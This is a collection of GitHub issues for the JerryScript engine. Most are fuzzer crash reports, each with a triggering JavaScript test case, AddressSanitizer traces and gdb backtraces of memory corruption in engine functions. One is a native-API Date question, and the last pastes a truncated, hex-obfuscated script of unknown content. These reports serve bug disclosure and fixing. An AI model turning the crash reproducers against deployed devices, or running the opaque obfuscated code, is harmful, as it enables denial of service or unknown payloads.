#10 0x4285a8 in ecma_process_all_enqueued_jobs /home/test/AST/jerryscript/jerry-core/ecma/operations/ecma-jobqueue.c:529
#11 0x402a94 in main /home/test/AST/jerryscript/jerry-main/main-unix.c:286
#12 0x7fee06b9183f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#13 0x404238 in _start (/home/test/AST/jerryscript/build/bin/jerry+0x404238)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/test/AST/jerryscript/jerry-core/ecma/base/ecma-property-hashmap.c:480 ecma_property_hashmap_find
==4638==ABORTING
```
```
$ ls
Memory_corruption_ecma_property_hashmap_find.js
$ ../jerryscript-noasan/build/bin/jerry Memory_corruption_ecma_property_hashmap_find.js
Segmentation fault (core dumped)
```
###### Backtrace
```
$ gdb -args ../../../../AST/jerryscript-noasan/build/bin/jerry Memory_corruption_ecma_property_hashmap_find.js
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ../../jerryscript-noasan/build/bin/jerry...done.
(gdb) r
Starting program: /home/test/AST/jerryscript-noasan/build/bin/jerry Memory_corruption_ecma_property_hashmap_find.js
Program received signal SIGSEGV, Segmentation fault.
0x000000000040a05e in ecma_property_hashmap_find (hashmap_p=0x66d408 <jerry_global_heap+24792>, name_p=name_p@entry=0x667910 <jerry_global_heap+1504>,
property_real_name_cp=property_real_name_cp@entry=0x7fffffffe04e) at /home/test/AST/jerryscript-noasan/jerry-core/ecma/base/ecma-property-hashmap.c:480
480 if (pair_list_p[entry_index] != ECMA_NULL_POINTER)
(gdb) x/3i $rip
=> 0x40a05e <ecma_property_hashmap_find+288>: movzwl 0x0(%rbp,%rax,2),%edi
0x40a063 <ecma_property_hashmap_find+293>: mov %r14d,%eax
0x40a066 <ecma_property_hashmap_find+296>: shr $0x3,%eax
(gdb) p/x $rax
$1 = 0x52f212f4
(gdb) x/gx $rax
0x52f212f4: Cannot access memory at address 0x52f212f4
``` | Memory corruption in in ecma_property_hashmap_find (jerryscript/jerry-core/ecma/base/ecma-property-hashmap.c:480) | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4094/comments | 0 | 2020-08-03T08:54:19Z | 2020-08-12T18:50:49Z | https://github.com/jerryscript-project/jerryscript/issues/4094 | 671,914,549 | 4,094 |
[
"jerryscript-project",
"jerryscript"
]
|
Memory corruption in in ecma_collection_check_duplicated_entries (jerryscript/jerry-core/ecma/base/ecma-helpers-collection.c:204)
###### JerryScript revision
commit : https://github.com/jerryscript-project/jerryscript/commit/26a299adf0318354caebf3294c46a35ddb9bae50
version : v2.3.0
###### Build platform
Ubuntu 16.04.1 LTS (4.15.0-45-generic x86_64)
###### Build steps
```
python tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \
--strip=off --logging=on \
--compile-flag=-fsanitize=address --stack-limit=15
```
###### Test case
Memory_corruption_ecma_collection_check_duplicated_entries.js
```
function main() {
var v4 = Array("5PS2Lo7K4R",7,7,Array,..."5PS2Lo7K4R");
var v6 = "5PS2Lo7K4R" || "5PS2Lo7K4R";
var v9 = "FyENNPuYX*".match(0);
function v10(v11,v12) {
}
var v15 = ["trFYu6cu5w"];
async function v17(v18,v19,v20,v21,v22) {
var v23 = v17(1,v20,v15,v19,13.37);
var v27 = [-370590.12831863505,-370590.12831863505,-370590.12831863505,-370590.12831863505];
var v29 = {b:v27,c:1337,constructor:v27,e:1337};
var v31 = new Proxy(v29,Object);
var v32 = new Proxy(v31,Boolean);
var v34 = {__proto__:v32};
var v36 = Object.seal(v31,"number",v34);
}
var v39 = v17(13.37,13.37,"EPSILON","EPSILON",v17);
var v41 = [13.37];
var v43 = [1337,1337];
var v44 = v41[-4096];
var v46 = 0;
var v47 = v46 + 1;
var v49 = 0;
var v50 = v49 + 1;
var v52 = undefined;
var v53 = [1337,1337,v41,1337,"5PS2Lo7K4R",v43,v41];
var v54 = {b:Int32Array,d:7,length:"5PS2Lo7K4R",toString:v41};
var v55 = {__proto__:1337,a:v53,b:v41,constructor:Int32Array,length:7,toString:Int32Array,valueOf:13.37};
var v56 = 7;
var v61 = [13.37,13.37,13.37];
var v62 = Float32Array | v61;
var v63 = 0;
var v64 = !13.37;
var v65 = v63 + 1;
v63 = v65;
var v67 = "trFYu6cu5w".__proto__;
var v70 = 0;
var v71 = v70 + 1;
v70 = v71;
try {
var v72 = ~v67;
} catch(v73) {
var v76 = [13.37,13.37,13.37];
var v78 = 1337;
var v80 = new Uint16Array(v78);
var v81 = 0;
var v82 = v80 & 13.37;
var v84 = undefined;
var v86 = [13.37,13.37,13.37];
function v87(v88,v89) {
}
}
var v92 = new Uint16Array(60947);
var v95 = 7;
var v96 = "trFYu6cu5w"[v95];
var v99 = ["EPSILON"];
var v100 = v99;
var v103 = String;
var v106 = Array(128);
var v107 = ["number"];
var v108 = v107;
var v110 = undefined;
var v112 = [v100];
var v113 = Math.round;
var v114 = Reflect.apply(v113,v96,v112);
var v117 = 0;
var v118 = v117 + 1;
v117 = v118;
var v122 = [13.37];
var v124 = [1337];
var v125 = [v122,13.37];
var v126 = {constructor:v125,d:Proxy,e:Proxy,length:"string",valueOf:v125};
var v127 = {};
var v128 = v122;
var v129 = {};
function* v132(v133,v134) {
return v124;
}
var v135 = [-370590.12831863505,-370590.12831863505,-370590.12831863505,-370590.12831863505];
var v137 = {b:v135,c:64,constructor:v135,e:64};
var v138 = {call:v132,length:v129,getOwnPropertyDescriptor:v132,has:v132,isExtensible:v132,ownKeys:v132,preventExtensions:v132,set:v132};
var v140 = new Proxy(v137,v138);
var v141 = [1337,1337,1337,1337];
var v143 = JSON.stringify;
var v144 = v141.reduceRight(v143,v140);
// Stderr:
}
main();
```
###### Execution steps
```
$ ls
Memory_corruption_ecma_collection_check_duplicated_entries.js
$ ../jerryscript/build/bin/jerry Memory_corruption_ecma_collection_check_duplicated_entries.js
ASAN:SIGSEGV
=================================================================
==4583==ERROR: AddressSanitizer: SEGV on unknown address 0x00000075b000 (pc 0x00000040d100 bp 0x00000001ff06 sp 0x7ffe8579ba90 T0)
#0 0x40d0ff in ecma_collection_check_duplicated_entries /home/test/AST/jerryscript/jerry-core/ecma/base/ecma-helpers-collection.c:204
#1 0x431e55 in ecma_proxy_object_own_property_keys /home/test/AST/jerryscript/jerry-core/ecma/operations/ecma-proxy-object.c:1574
#2 0x42ccf8 in ecma_op_object_own_property_keys /home/test/AST/jerryscript/jerry-core/ecma/operations/ecma-objects.c:2213
#3 0x42d604 in ecma_op_object_get_enumerable_property_names /home/test/AST/jerryscript/jerry-core/ecma/operations/ecma-objects.c:1904
#4 0x418291 in ecma_builtin_json_serialize_object /home/test/AST/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:988
#5 0x418291 in ecma_builtin_json_serialize_property /home/test/AST/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:1380
#6 0x41858b in ecma_builtin_json_str_helper /home/test/AST/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:1419
#7 0x419c2b in ecma_builtin_json_stringify /home/test/AST/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.c:1694
#8 0x419c2b in ecma_builtin_json_dispatch_routine /home/test/AST/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-json.inc.h:34
#9 0x41b3e1 in ecma_builtin_dispatch_routine /home/test/AST/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1181
#10 0x41b3e1 in ecma_builtin_dispatch_call /home/test/AST/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1205
#11 0x4260e1 in ecma_op_function_call /home/test/AST/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1142
#12 0x465eed in ecma_builtin_array_reduce_from /home/test/AST/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:2239
#13 0x465eed in ecma_builtin_array_prototype_dispatch_routine /home/test/AST/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:2855
#14 0x41b3e1 in ecma_builtin_dispatch_routine /home/test/AST/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1181
#15 0x41b3e1 in ecma_builtin_dispatch_call /home/test/AST/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1205
#16 0x4260e1 in ecma_op_function_call /home/test/AST/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1142
#17 0x45e6f1 in opfunc_call /home/test/AST/jerryscript/jerry-core/vm/vm.c:778
#18 0x45e6f1 in vm_execute /home/test/AST/jerryscript/jerry-core/vm/vm.c:4681
#19 0x45f78b in vm_run /home/test/AST/jerryscript/jerry-core/vm/vm.c:4783
#20 0x424c34 in ecma_op_function_call_simple /home/test/AST/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:943
#21 0x4260e1 in ecma_op_function_call /home/test/AST/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1142
#22 0x45e6f1 in opfunc_call /home/test/AST/jerryscript/jerry-core/vm/vm.c:778
#23 0x45e6f1 in vm_execute /home/test/AST/jerryscript/jerry-core/vm/vm.c:4681
#24 0x45f78b in vm_run /home/test/AST/jerryscript/jerry-core/vm/vm.c:4783
#25 0x406a59 in jerry_run /home/test/AST/jerryscript/jerry-core/api/jerry.c:579
#26 0x4026db in main /home/test/AST/jerryscript/jerry-main/main-unix.c:123
#27 0x7f767c5e983f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#28 0x404238 in _start (/home/test/AST/jerryscript/build/bin/jerry+0x404238)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/test/AST/jerryscript/jerry-core/ecma/base/ecma-helpers-collection.c:204 ecma_collection_check_duplicated_entries
==4583==ABORTING
```
```
$ ls
Memory_corruption_ecma_collection_check_duplicated_entries.js
$ ../jerryscript-noasan/build/bin/jerry Memory_corruption_ecma_collection_check_duplicated_entries.js
Segmentation fault (core dumped)
```
###### Backtrace
```
$ gdb -args ../../../../AST/jerryscript-noasan/build/bin/jerry Memory_corruption_ecma_collection_check_duplicated_entries.js
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ../../jerryscript-noasan/build/bin/jerry...done.
(gdb) r
Starting program: /home/test/AST/jerryscript-noasan/build/bin/jerry Memory_corruption_ecma_collection_check_duplicated_entries.js
Program received signal SIGSEGV, Segmentation fault.
ecma_collection_check_duplicated_entries (collection_p=collection_p@entry=0x668840 <jerry_global_heap+5392>) at /home/test/AST/jerryscript-noasan/jerry-core/ecma/base/ecma-helpers-collection.c:204
204 ecma_string_t *current_name_p = ecma_get_prop_name_from_value (buffer_p[i]);
(gdb) x/3i $rip
=> 0x405d8d <ecma_collection_check_duplicated_entries+31>: mov 0x0(%r13,%rax,4),%edi
0x405d92 <ecma_collection_check_duplicated_entries+36>: mov %ebx,%ebp
0x405d94 <ecma_collection_check_duplicated_entries+38>: callq 0x4088d3 <ecma_get_prop_name_from_value>
(gdb) p/x $rax
$1 = 0x281ec
(gdb) x/gx $rax
0x281ec: Cannot access memory at address 0x281ec
``` | Memory corruption in in ecma_collection_check_duplicated_entries (jerryscript/jerry-core/ecma/base/ecma-helpers-collection.c:204) | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4093/comments | 0 | 2020-08-03T08:43:18Z | 2020-08-03T15:27:50Z | https://github.com/jerryscript-project/jerryscript/issues/4093 | 671,907,911 | 4,093 |
[
"jerryscript-project",
"jerryscript"
]
|
Memory corruption in in ecma_lcache_invalidate (jerryscript/jerry-core/ecma/base/ecma-lcache.c:209)
###### JerryScript revision
commit : https://github.com/jerryscript-project/jerryscript/commit/26a299adf0318354caebf3294c46a35ddb9bae50
version : v2.3.0
###### Build platform
Ubuntu 16.04.1 LTS (4.15.0-45-generic x86_64)
###### Build steps
```
python tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \
--strip=off --logging=on \
--compile-flag=-fsanitize=address --stack-limit=15
```
###### Test case
xxxxxxxxxxxx.js
```
function main() {
var v3 = "AhzGEZ4UBQ".__proto__;
var v6 = [13.37,13.37];
var v8 = [13.37,13.37,13.37];
var v10 = [255];
async function v12(v13,v14,v15,v16,v17) {
var v18 = v12(127,v17,v10,v8,v16);
var v26 = [939162.7217443376,Float32Array,939162.7217443376,939162.7217443376];
var v28 = {b:v26,c:1337,constructor:v26,e:1337};
var v30 = new ArrayBuffer(v28);
var v31 = v30.slice(9007199254740992,536870912);
var v33 = [1.0,1.0,1.0,1.0];
var v35 = {call:1.0,construct:1.0,defineProperty:"EPSILON",deleteProperty:1337,getOwnPropertyDescriptor:1.0,getPrototypeOf:1337,has:644405221,set:"EPSILON",setPrototypeOf:v33};
var v37 = new Proxy(Float32Array,v35);
var v38 = v26.flatMap(v16,v28);
var v41 = 1337 == null;
v16.__proto__ = v37;
}
var v43 = [1337,1337];
var v44 = [];
var v45 = {c:66232812,constructor:66232812};
var v48 = 0;
while (v48 < 9) {
var v49 = v48 + 1;
v48 = v49;
}
var v50 = {b:13.37,a:1337,d:isFinite,e:13.37,length:v44,toString:v44};
async function v55(v56,v57,v58,v59,v60) {
function* v63(v64,v65,v66,v67,v68) {
yield* v67;
}
var v69 = v63("MIN_VALUE",-1165603609,..."MIN_VALUE",-1165603609);
var v71 = new WeakMap(v69);
}
var v74 = v55(13.37,13.37,"EPSILON","EPSILON",v55);
var v75 = [13.37,13.37,13.37];
var v76 = ["trFYu6cu5w"];
var v77 = {__proto__:v75,b:1,constructor:13.37,valueOf:v76};
var v80 = [2995767872,2995767872,2995767872,2995767872,2995767872];
var v81 = [...v80,..."EPSILON"];
var v84 = undefined;
var v86 = v81.filter("EPSILON");
var v87 = 66232812;
var v90 = 0;
var v91 = v90 + 1;
v90 = v91;
var v93 = Math.acos(v90,0);
var v95 = [-284091.18646696594,-284091.18646696594,-284091.18646696594];
var v97 = Number[5];
var v99 = JSON.parse(v95,v97);
// Stderr:
}
main();
```
###### Execution steps
1. Username must contains 4 letters (example: xxxx. x can be any letters.).
2. js file must in /home/xxxx/xxx/xxxxxxx/xxxxxx/xxxxxxxx/ (x can be any letters).
3. js filename must contains 12 letters (example: xxxxxxxxxxxx.js. x can be any letters).
4. run with jsfile's full path (example: /home/xxxx/xxx/xxxxxxx/xxxxxx/xxxxxxxx/xxxxxxxxxxxx.js. x can be any letters).
```
$ ls
xxxxxxxxxxxx.js
$ pwd
/home/test/xxx/xxxxxxx/xxxxxx/xxxxxxxx
$ ../jerryscript/build/bin/jerry /home/test/xxx/xxxxxxx/xxxxxx/xxxxxxxx/xxxxxxxxxxxx.js
TypeError
ASAN:SIGSEGV
=================================================================
==2769==ERROR: AddressSanitizer: SEGV on unknown address 0x00000075b008 (pc 0x00000041630e bp 0x0000006da5c0 sp 0x7ffcb766ab30 T0)
#0 0x41630d in ecma_lcache_invalidate /home/test/AST/jerryscript/jerry-core/ecma/base/ecma-lcache.c:209
#1 0x414cb9 in ecma_free_property /home/test/AST/jerryscript/jerry-core/ecma/base/ecma-helpers.c:795
#2 0x40b390 in ecma_gc_free_properties /home/test/AST/jerryscript/jerry-core/ecma/base/ecma-gc.c:1088
#3 0x40c6b6 in ecma_gc_free_object /home/test/AST/jerryscript/jerry-core/ecma/base/ecma-gc.c:1460
#4 0x40c6b6 in ecma_gc_run /home/test/AST/jerryscript/jerry-core/ecma/base/ecma-gc.c:1589
#5 0x41601c in ecma_finalize /home/test/AST/jerryscript/jerry-core/ecma/base/ecma-init-finalize.c:85
#6 0x4065b7 in jerry_cleanup /home/test/AST/jerryscript/jerry-core/api/jerry.c:238
#7 0x402b56 in main /home/test/AST/jerryscript/jerry-main/main-unix.c:324
#8 0x7f3c8e34383f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#9 0x404238 in _start (/home/test/AST/jerryscript/build/bin/jerry+0x404238)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/test/AST/jerryscript/jerry-core/ecma/base/ecma-lcache.c:209 ecma_lcache_invalidate
==2769==ABORTING
```
```
$ ls
xxxxxxxxxxxx.js
$ pwd
/home/test/xxx/xxxxxxx/xxxxxx/xxxxxxxx
$ ../jerryscript-noasan/build/bin/jerry /home/test/xxx/xxxxxxx/xxxxxx/xxxxxxxx/xxxxxxxxxxxx.js
TypeError
Segmentation fault (core dumped)
```
###### Backtrace
```
$ gdb -args ../../../../AST/jerryscript-noasan/build/bin/jerry /home/test/xxx/xxxxxxx/xxxxxx/xxxxxxxx/xxxxxxxxxxxx.js
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ../../../../AST/jerryscript-noasan/build/bin/jerry...done.
(gdb) r
Starting program: /home/test/AST/jerryscript-noasan/build/bin/jerry /home/test/xxx/xxxxxxx/xxxxxx/xxxxxxxx/xxxxxxxxxxxx.js
TypeError
Program received signal SIGSEGV, Segmentation fault.
ecma_lcache_invalidate (object_p=object_p@entry=0x667388 <jerry_global_heap+88>, name_cp=name_cp@entry=0, prop_p=prop_p@entry=0x667340 <jerry_global_heap+16> "(")
at /home/test/AST/jerryscript-noasan/jerry-core/ecma/base/ecma-lcache.c:209
209 if (entry_p->id != 0 && entry_p->prop_p == prop_p)
(gdb) x/3i $rip
=> 0x4098d0 <ecma_lcache_invalidate+29>: cmpl $0x0,0x8(%rax)
0x4098d4 <ecma_lcache_invalidate+33>: je 0x4098ef <ecma_lcache_invalidate+60>
0x4098d6 <ecma_lcache_invalidate+35>: cmp %rbp,(%rax)
(gdb) p/x $rax
$1 = 0x709000
(gdb) x/gx $rax
0x709000: Cannot access memory at address 0x709000
``` | Memory corruption in in ecma_lcache_invalidate (jerryscript/jerry-core/ecma/base/ecma-lcache.c:209) | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4092/comments | 1 | 2020-08-03T08:33:25Z | 2020-08-12T12:34:04Z | https://github.com/jerryscript-project/jerryscript/issues/4092 | 671,902,139 | 4,092 |
[
"jerryscript-project",
"jerryscript"
]
|
###### JerryScript revision
commit : https://github.com/jerryscript-project/jerryscript/commit/227007eda75d86db1bb32ea380cf9650122d6920
version : v2.3.0
###### Build platform
Ubuntu 16.04.1 LTS (4.15.0-45-generic x86_64)
###### Build steps
```
python tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \
--strip=off --logging=on \
--compile-flag=-fsanitize=address --stack-limit=15
```
###### Test case
main.js
```
print('esm');
import * as Foo from './foo.js';
print(Foo.x);
print(Foo.y());
print(Foo.z);
print(Foo.shortVar);
print(Foo.a);
print(Foo.b);
import { y, z as zAliased } from './foo.js';
print(y(), zAliased);
print(FooDefault());
import FooDefault from './foo.js';
```
foo.js
```
export var x = 42;
export function y() {
return 182;
}
export default function() {
return 352;
}
var myLongVariableName = 472;
var shortVar = 157;
export {myLongVariableName as z, shortVar};
export * from './bar.js';
```
bar.js
```
export var a = 24;
export var b = 1845;
export default 843;
```
###### Execution steps
```
$ ls
bar.js foo.js main.js
$ ../jerryscript-asan/build/bin/jerry main.js
ASAN:SIGSEGV
=================================================================
==73016==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000413b68 bp 0x000000000000 sp 0x7ffc47d006f8 T0)
#0 0x413b67 in ecma_get_lex_env_type /home/test/AST/jerryscript/jerry-core/ecma/base/ecma-helpers.c:276
#1 0x4753a9 in ecma_op_get_value_lex_env_base /home/test/AST/jerryscript/jerry-core/ecma/operations/ecma-get-put-value.c:56
#2 0x462bbf in ecma_module_namespace_object_add_export_if_needed /home/test/AST/jerryscript/jerry-core/ecma/base/ecma-module.c:507
#3 0x4637eb in ecma_module_namespace_object_add_export_if_needed /home/test/AST/jerryscript/jerry-core/ecma/base/ecma-module.c:486
#4 0x4637eb in ecma_module_create_namespace_object /home/test/AST/jerryscript/jerry-core/ecma/base/ecma-module.c:573
#5 0x4637eb in ecma_module_connect_imports /home/test/AST/jerryscript/jerry-core/ecma/base/ecma-module.c:735
#6 0x4637eb in ecma_module_initialize_current /home/test/AST/jerryscript/jerry-core/ecma/base/ecma-module.c:821
#7 0x46068a in vm_run_global /home/test/AST/jerryscript/jerry-core/vm/vm.c:328
#8 0x40653a in jerry_run /home/test/AST/jerryscript/jerry-core/api/jerry.c:579
#9 0x402c6f in main /home/test/AST/jerryscript/jerry-main/main-unix.c:759
#10 0x7f0fe6b9083f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#11 0x404788 in _start (/home/test/AST/jerryscript-asan/build/bin/jerry+0x404788)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/test/AST/jerryscript/jerry-core/ecma/base/ecma-helpers.c:276 ecma_get_lex_env_type
==73016==ABORTING
```
```
$ ls
bar.js foo.js main.js
$ ../jerryscript/build/bin/jerry main.js
Segmentation fault (core dumped)
```
###### Backtrace
```
$ gdb -arg ../jerryscript/build/bin/jerry main.js
(gdb) r
Starting program: /home/test/AST/jerryscript/build/bin/jerry main.js
Program received signal SIGSEGV, Segmentation fault.
ecma_get_lex_env_type (object_p=object_p@entry=0x0) at /home/test/AST/jerryscript/jerry-core/ecma/base/ecma-helpers.c:276
276 return (ecma_lexical_environment_type_t) (object_p->type_flags_refs & ECMA_OBJECT_TYPE_MASK);
(gdb) bt
#0 ecma_get_lex_env_type (object_p=object_p@entry=0x0) at /home/test/AST/jerryscript/jerry-core/ecma/base/ecma-helpers.c:276
#1 0x00000000004382e0 in ecma_op_get_value_lex_env_base (lex_env_p=0x0, ref_base_lex_env_p=0x7fffffffdae0, name_p=0x764ad0 <jerry_global_heap+1928>)
at /home/test/AST/jerryscript/jerry-core/ecma/operations/ecma-get-put-value.c:56
#2 0x000000000042c0ae in ecma_module_namespace_object_add_export_if_needed (module_p=module_p@entry=0x764658 <jerry_global_heap+784>, export_name_p=export_name_p@entry=0x764ad0 <jerry_global_heap+1928>)
at /home/test/AST/jerryscript/jerry-core/ecma/base/ecma-module.c:507
#3 0x000000000042c47f in ecma_module_namespace_object_add_export_if_needed (export_name_p=0x764ad0 <jerry_global_heap+1928>, module_p=0x764658 <jerry_global_heap+784>)
at /home/test/AST/jerryscript/jerry-core/ecma/base/ecma-module.c:486
#4 ecma_module_create_namespace_object (module_p=0x764658 <jerry_global_heap+784>) at /home/test/AST/jerryscript/jerry-core/ecma/base/ecma-module.c:573
#5 ecma_module_connect_imports () at /home/test/AST/jerryscript/jerry-core/ecma/base/ecma-module.c:735
#6 ecma_module_initialize_current () at /home/test/AST/jerryscript/jerry-core/ecma/base/ecma-module.c:821
#7 0x000000000042aa72 in vm_run_global (bytecode_p=0x764870 <jerry_global_heap+1320>) at /home/test/AST/jerryscript/jerry-core/vm/vm.c:328
#8 0x0000000000402b90 in jerry_run (func_val=<optimized out>) at /home/test/AST/jerryscript/jerry-core/api/jerry.c:579
#9 0x0000000000401479 in main (argc=<optimized out>, argv=<optimized out>) at /home/test/AST/jerryscript/jerry-main/main-unix.c:759
(gdb) x/5i $rip
=> 0x408dc4 <ecma_get_lex_env_type>: mov (%rdi),%ax
0x408dc7 <ecma_get_lex_env_type+3>: and $0xf,%eax
0x408dca <ecma_get_lex_env_type+6>: retq
0x408dcb <ecma_get_lex_env_binding_object>: movzwl 0x4(%rdi),%edi
0x408dcf <ecma_get_lex_env_binding_object+4>: jmpq 0x41bc29 <jmem_decompress_pointer>
(gdb) p/x $rdi
$1 = 0x0
```
[SEGV-on-unknown-address-ecma_get_lex_env_type.tar.gz](https://github.com/jerryscript-project/jerryscript/files/4986410/SEGV-on-unknown-address-ecma_get_lex_env_type.tar.gz)
| Memory corruption in in ecma_get_lex_env_type (jerryscript/jerry-core/ecma/base/ecma-helpers.c:276) | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4076/comments | 0 | 2020-07-28T06:48:28Z | 2020-07-31T15:19:06Z | https://github.com/jerryscript-project/jerryscript/issues/4076 | 666,814,219 | 4,076 |
[
"jerryscript-project",
"jerryscript"
]
|
###### JerryScript revision
da5b058
###### Build platform
Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64)
###### Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address \
--compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \
--compile-flag=-fno-common --compile-flag=-g --strip=off \
--system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \
--error-messages=on --profile=es2015-subset --lto=off
```
###### Test case
```
function print(value){}
print(String.fromCharCode(new new Proxy(Function(), { get:String.fromCharCode}), 0, false, 67));
```
###### Output
```
Script Error: TypeError: Cannot convert a Symbol value to a number.
ICE: Assertion 'JERRY_CONTEXT (current_new_target) == NULL' failed at /home/jerryscript/jerry-core/ecma/base/ecma-init-finalize.c(ecma_finalize):76.
Error: ERR_FAILED_INTERNAL_ASSERTION
Aborted (core dumped)
```
Credits: This vulnerability is detected by chong from OWL337. | Assertion 'JERRY_CONTEXT (current_new_target) == NULL' in ecma_finalize | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4059/comments | 0 | 2020-07-26T07:37:24Z | 2020-07-27T17:32:55Z | https://github.com/jerryscript-project/jerryscript/issues/4059 | 665,728,383 | 4,059 |
[
"jerryscript-project",
"jerryscript"
]
| Hi, I'm having hard time to figure out how to get the Date.year, month, date in the native C code. Also having hard time to figure out how to return a Date object from native to javascript. Thanks
Javascript
```javascript
let date = native_driver_gui_calendar.setTodayDate(new Date(2020, 6, 10));
```
Native C
```C
static jerry_value_t function_native_driver_gui_calendar_setTodayDate(const jerry_value_t func_value, /**< function object */
const jerry_value_t this_value, /**< this arg */
const jerry_value_t args[], /**< function arguments */
const jerry_length_t args_cnt) /**< number of function arguments */
{
//How to get the year, month, date of a Date object?
//The following code returns all zero
printf("Year:%d Month:%d Day:%d\n", ecma_date_year_from_time(args[0]), ecma_date_month_from_time(args[0]), ecma_date_date_from_time(args[0]));
//How to return "new Date(2020, 0,0)" value to the javascript?
return jerry_create_date();
}
``` | Question: How to handle Date object in native C? | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4058/comments | 2 | 2020-07-26T00:41:31Z | 2020-08-03T09:19:56Z | https://github.com/jerryscript-project/jerryscript/issues/4058 | 665,684,833 | 4,058 |
[
"jerryscript-project",
"jerryscript"
]
| please i don't really know how to convert and edit this code below, and please i really want to know what is inside the script
<script type='text/javascript'>
//<![CDATA[
var _0xb2ac=["\x36\x5A\x28\x36\x52\x28\x70\x2C\x61\x2C\x63\x2C\x6B\x2C\x65\x2C\x72\x29\x7B\x65\x3D\x36\x52\x28\x63\x29\x7B\x36\x53\x28\x63\x3C\x61\x3F\x27\x27\x3A\x65\x28\x36\x55\x28\x63\x2F\x61\x29\x29\x29\x2B\x28\x28\x63\x3D\x63\x25\x61\x29\x3E\x33\x35\x3F\x36\x56\x2E\x37\x30\x28\x63\x2B\x32\x39\x29\x3A\x63\x2E\x37\x31\x28\x33\x36\x29\x29\x7D\x3B\x36\x54\x28\x21\x27\x27\x2E\x36\x57\x28\x2F\x5E\x2F\x2C\x36\x56\x29\x29\x7B\x36\x58\x28\x63\x2D\x2D\x29\x72\x5B\x65\x28\x63\x29\x5D\x3D\x6B\x5B\x63\x5D\x7C\x7C\x65\x28\x63\x29\x3B\x6B\x3D\x5B\x36\x52\x28\x65\x29\x7B\x36\x53\x20\x72\x5B\x65\x5D\x7D\x5D\x3B\x65\x3D\x36\x52\x28\x29\x7B\x36\x53\x27\x5C\x5C\x77\x2B\x27\x7D\x3B\x63\x3D\x31\x7D\x3B\x36\x58\x28\x63\x2D\x2D\x29\x36\x54\x28\x6B\x5B\x63\x5D\x29\x70\x3D\x70\x2E\x36\x57\x28\x36\x59\x20\x37\x32\x28\x27\x5C\x5C\x62\x27\x2B\x65\x28\x63\x29\x2B\x27\x5C\x5C\x62\x27\x2C\x27\x67\x27\x29\x2C\x6B\x5B\x63\x5D\x29\x3B\x36\x53\x20\x70\x7D\x28\x27\x45\x20\x33\x6F\x3D\x5B\x5C\x27\x5C\x5C\x35\x5C\x5C\x6E\x5C\x5C\x6E\x5C\x5C\x63\x5C\x5C\x4C\x5C\x27\x2C\